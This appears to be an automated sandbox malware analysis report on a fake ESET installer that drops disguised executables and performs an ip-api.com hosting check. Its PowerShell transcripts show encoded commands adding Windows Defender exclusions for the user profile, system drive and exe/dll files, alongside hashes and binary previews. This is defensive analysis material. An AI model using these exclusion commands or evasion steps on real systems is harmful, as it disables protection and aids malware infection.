                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0;b..................B..@................B...@...........................C...............................................C.<.....................C.0I..........................................h.C.@.............B.\............................text...e?.......@.................. ..`.QDwHSV..Q@..P...R@..D.............. ..`.rdata..~.....B.......B.............@..@.data.........C.......C.............@....5{mr ........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\12.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Eset32.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2149888
                                                    Entropy (8bit):7.992953608237496
                                                    Encrypted:true
                                                    SSDEEP:49152:+N1rE8yADMs6VVlywsIQH4V6Egj8ifqeuN9aDndygIRU:+ECDHWVlsZedgZfqeUChz
                                                    MD5:7ADD9A3AB1734828F756F2725C452C9A
                                                    SHA1:8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629
                                                    SHA-256:DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
                                                    SHA-512:CD8582431009BA4B192D73E6E0494318D73E02993C9981C16F7481B30395F8DB9CDAF11B6D0D00AC487BE511CFFD5479FA70BCF5BB713CFAA7EDF7E8E87663F9
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 60%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 60%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....1;b.........."....... .............. .....@..... ........................!...........@...@......@............... ................................ ............... .."........................................................................... ..H............text..... .. .... ................. ..`.rsrc......... ....... .............@..@........................................H.......l4 .<.......;...................................................&...=W...#.".H..e._@....;.'z?.[sY... #)Lt........./2,.k..u..,W.m|..K.....,o...9G..Xt..'_.pN.3~.4...X.E....J6.[..,..r..wx.pE.....e..g...is.#.........l..E..F.f$1....".....f.-...yp......(.%ns..?^tc.Yw......%..t..rI.F..C.C"..j%.go$z.o.uAZ.......h......s.0..W-Yf......A.P.H]3.".sv....g.z.Q.S...l..55.`..w)c..Hx..;...t....a...J..l.(.T.4.;d...`..~..06T0.....c.".N.._.R..6.......U...4........g7$?L/..W.kJ.

                                                    C:\Users\user\AppData\Roaming\Windows\System.exe

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\12.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2149888
                                                    Entropy (8bit):7.992953608237496
                                                    Encrypted:true
                                                    SSDEEP:49152:+N1rE8yADMs6VVlywsIQH4V6Egj8ifqeuN9aDndygIRU:+ECDHWVlsZedgZfqeUChz
                                                    MD5:7ADD9A3AB1734828F756F2725C452C9A
                                                    SHA1:8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629
                                                    SHA-256:DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
                                                    SHA-512:CD8582431009BA4B192D73E6E0494318D73E02993C9981C16F7481B30395F8DB9CDAF11B6D0D00AC487BE511CFFD5479FA70BCF5BB713CFAA7EDF7E8E87663F9
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 60%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 60%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....1;b.........."....... .............. .....@..... ........................!...........@...@......@............... ................................ ............... .."........................................................................... ..H............text..... .. .... ................. ..`.rsrc......... ....... .............@..@........................................H.......l4 .<.......;...................................................&...=W...#.".H..e._@....;.'z?.[sY... #)Lt........./2,.k..u..,W.m|..K.....,o...9G..Xt..'_.pN.3~.4...X.E....J6.[..,..r..wx.pE.....e..g...is.#.........l..E..F.f$1....".....f.-...yp......(.%ns..?^tc.Yw......%..t..rI.F..C.C"..j%.go$z.o.uAZ.......h......s.0..W-Yf......A.P.H]3.".sv....g.z.Q.S...l..55.`..w)c..Hx..;...t....a...J..l.(.T.4.;d...`..~..06T0.....c.".N.._.R..6.......U...4........g7$?L/..W.kJ.

                                                    C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):66560
                                                    Entropy (8bit):5.675775271948851
                                                    Encrypted:false
                                                    SSDEEP:768:aQ//9WZSGIDUYU/+sdVaBk5EedlAiAJA1kt88ryseCmcgu+L5NtQEUF9zu1w13ue:JIZFIudWjtjOcfgpLpw13u9RGnlp3
                                                    MD5:E2DD8887AEE175EF9BEFD87B2F6105B3
                                                    SHA1:DFC0527E7425EF633DB3DB034E2E3DB8E09F9B28
                                                    SHA-256:C09D1684236D9CE1D7E0C1C14119B4DC84CBC841DA4F4FB84131AA0F367F38F1
                                                    SHA-512:2313792B160D1D6E28BC2CC2D45BA25773BD5CA1434026316181088C4385C9265922174D65DFAC377768024F67F7B9E4CB1B9B6A4FA08606324797E4E1F1E93F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 30%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Reputation:unknown
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...m1;b................................. ....@...... .......................@............@...@......@............... ............................... ..@............................................................................................ ..H............text........ ...................... ..`.rsrc...@.... ......................@..@........................................H...........0g..............n............................................(....*...(0...*.0.......... ........8........E............8....*.~....~<...(.....(......... ....(....:....& ....8........E........$...8....(.... ....(....:....& ....8........& ....(....9....&8........E........*...8.....~>...(.... ....(....9....& ....8.....:... ....(....9....&8...........&.n..V.....0.......... ........8........E....................8....*.r...p.. /...8........E1...................!...P......._...

                                                    C:\Users\user\Documents\20220324\PowerShell_transcript.841618.0_G0nLw0.20220324221054.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.526227340041785
                                                    Encrypted:false
                                                    SSDEEP:96:BZZ/8N2cLqDo1ZJFZd/8N2cLqDo1ZA3x1xvxjZf/8N2cLqDo1ZFSx/x/xWeZ4H:lcdcic7fH
                                                    MD5:2A07327783C8C059278FB8131A15BC86
                                                    SHA1:72A793666AD245E17EE327066392AAB66F4A8578
                                                    SHA-256:428716E884350ADB02D14DC21BF1832BE3CFFEADC03F91889BE8EAC50B8F822C
                                                    SHA-512:9FC92E8F0D6D9CE6364F3C4CE486C15667856B01BC36C9630F6673E31012C2DFF60132AFA7EA813ED14031E602E9B24841755CC8F8299C4DD5CC163D094674CB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221056..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 6236..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221056..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S

                                                    C:\Users\user\Documents\20220324\PowerShell_transcript.841618.3pgwcPiq.20220324221049.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.524487604789142
                                                    Encrypted:false
                                                    SSDEEP:96:BZL/8N2cYqDo1ZDFZd/8N2cYqDo1Zo3x1xvxjZ4/8N2cYqDo1ZySx/x/xpZq:XcQcWcB
                                                    MD5:F0330880F2F7BDF92334BE868A3E2B76
                                                    SHA1:7FB360CC5173C1C87BA2A9D8B46733092212BE7D
                                                    SHA-256:579A82C295646CF09AD1D49D893B5AE26584C825202E65337B29778D9CEAA73E
                                                    SHA-512:3C8334679B855BD1B2893326322B7BEBFE3CE55DE0DBA67CDD9FB2C4CE26B119903017F81EB5FFDC6765DCAC3116181DFCC58E7BC5F775C56275B032C13BBF70
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5832..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221050..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S

                                                    C:\Users\user\Documents\20220324\PowerShell_transcript.841618.C+N4AHXZ.20220324221113.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5764
                                                    Entropy (8bit):5.524393941447013
                                                    Encrypted:false
                                                    SSDEEP:96:BZw/8N2AMiqDo1ZLZI/8N2AMiqDo1ZRgC4jZ9/8N2AMiqDo1ZSBoouZl:0tzW
                                                    MD5:FD595612596392EF16B26200199439F4
                                                    SHA1:06112F5363BFC9E636106AE33A263079CA122830
                                                    SHA-256:7495F81371E9D6D4316B38A94A66D63597C21ED48170B36D87E2643086D6528F
                                                    SHA-512:FD3CD847DACE784FBEB6C2680CC9543100DDC8E855394A80A1FB6D31ADF9D3FAE1FDBA3FE4043CEF98318AA2BED01B61037ABFDB6443E40BA5DDA878B5BCDBC8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221114..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6536..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221114..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220324221231..Username: computer\user..

                                                    C:\Users\user\Documents\20220324\PowerShell_transcript.841618.LAWMVj_f.20220324221018.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5764
                                                    Entropy (8bit):5.522947101485942
                                                    Encrypted:false
                                                    SSDEEP:96:BZI/8N2AM2tqDo1ZbZY/8N2AM2tqDo1Z8gC4jZ2/8N2AM2tqDo1ZUBooOZR:E/t+
                                                    MD5:75A1F14AC41D6806DAA818318C905D78
                                                    SHA1:BC191AECDC22CA7B0EA9EDCE1C630EA0413F03A1
                                                    SHA-256:469CD3329590793020ED92B36F3B62FEDCDB0C4281DB636C0FF0D31FFEC0EFEF
                                                    SHA-512:D742DBE9478175D35AEF470C444631E8BBDF83AAE27DF0B297B611856FB77FF6C0301B0D48068C71BDFFA47853B79EA61DFA1DBB5BFA371D62F1973ACB651947
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324221019..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6332..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324221019..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220324221136..Username: computer\user..

                                                    C:\Users\user\Documents\20220324\PowerShell_transcript.841618.sZdefLPX.20220324220950.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6069
                                                    Entropy (8bit):5.525103873550551
                                                    Encrypted:false
                                                    SSDEEP:96:BZa/8N2c4qDo1ZqLFZUm/8N2c4qDo1Zr3x1xvxjZl/8N2c4qDo1Z7Sx/x/xCZJ:OcNAOcmcY
                                                    MD5:96B72526B59BA604F3C8CEB114B96D15
                                                    SHA1:DAA9D1365D4766A78CB16003EFDE94D9E9B8F786
                                                    SHA-256:E58278B16390EA93E36F7E0769530BB23666CBC8946916A3F0E2B768CBAE9C1A
                                                    SHA-512:84AAFCA8526DC56CEDCC2466DD7AAF9FCA9D8F4755B2D63009962EF803DC0ACFE30FC40617D0A3018DB20CF43A843D3F1022D8700A0B47DA93A228E94A3044B8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220324220951..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 2600..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220324220951..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..S

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.986911660203424
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Eset32.exe
                                                    File size:4139932
                                                    MD5:b405bf6533c047b1a47ceced3b42c23b
                                                    SHA1:bbb321d380c3f9d17e49a9f2167234742e292e4d
                                                    SHA256:5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
                                                    SHA512:662af21fa3c267ca3a7b451d1a969e1b2dc4fd197368a066e7273b51673bf6def91b02b4d5e429c3b6947a5c97ceb17703b0e716eb6e6dc5a146ca2af40a4c82
                                                    SSDEEP:98304:52NBK/xafUdOXhsemQTJSDVnAjKU4trvh9L9mxSSKKE:KU48cXhsehTEVnPBo/E
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                    File Icon

                                                    Icon Hash:70f0ca9692f2f071

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x403348
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:ced282d9b261d1462772017fe2f6972b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F0995393483h
                                                        push ebx
                                                        call 00007F09953965E6h
                                                        cmp eax, ebx
                                                        je 00007F0995393479h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F0995396562h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F099539345Dh
                                                        push 0000000Bh
                                                        call 00007F09953965BAh
                                                        push 00000009h
                                                        call 00007F09953965B3h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F09953965A7h
                                                        cmp eax, ebx
                                                        je 00007F0995393481h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F0995393479h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x10fa0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x3f099c0x2200
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0x380000x10fa00x11000False0.147073184743data3.75019672411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x381900x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_DIALOG0x489b80x100dataEnglishUnited States
                                                        RT_DIALOG0x48ab80x11cdataEnglishUnited States
                                                        RT_DIALOG0x48bd80x60dataEnglishUnited States
                                                        RT_GROUP_ICON0x48c380x14dataEnglishUnited States
                                                        RT_MANIFEST0x48c500x34bXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 24, 2022 22:09:52.593719006 CET4977380192.168.2.5208.95.112.1
                                                        Mar 24, 2022 22:09:52.623347998 CET8049773208.95.112.1192.168.2.5
                                                        Mar 24, 2022 22:09:52.623478889 CET4977380192.168.2.5208.95.112.1
                                                        Mar 24, 2022 22:09:52.624797106 CET4977380192.168.2.5208.95.112.1
                                                        Mar 24, 2022 22:09:52.654623985 CET8049773208.95.112.1192.168.2.5
                                                        Mar 24, 2022 22:09:52.758847952 CET4977380192.168.2.5208.95.112.1
                                                        Mar 24, 2022 22:10:23.416403055 CET8049773208.95.112.1192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 24, 2022 22:09:52.541419029 CET6371253192.168.2.58.8.8.8
                                                        Mar 24, 2022 22:09:52.572071075 CET53637128.8.8.8192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Mar 24, 2022 22:09:52.541419029 CET192.168.2.58.8.8.80xe21dStandard query (0)ip-api.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Mar 24, 2022 22:09:52.572071075 CET8.8.8.8192.168.2.50xe21dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • ip-api.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549773208.95.112.180C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Mar 24, 2022 22:09:52.624797106 CET935OUTGET /line/?fields=hosting HTTP/1.1
                                                        Host: ip-api.com
                                                        Connection: Keep-Alive
                                                        Mar 24, 2022 22:09:52.654623985 CET935INHTTP/1.1 200 OK
                                                        Date: Thu, 24 Mar 2022 21:09:51 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 5
                                                        Access-Control-Allow-Origin: *
                                                        X-Ttl: 60
                                                        X-Rl: 44
                                                        Data Raw: 74 72 75 65 0a
                                                        Data Ascii: true


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:22:09:31
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\Desktop\Eset32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Eset32.exe"
                                                        Imagebase:0x400000
                                                        File size:4139932 bytes
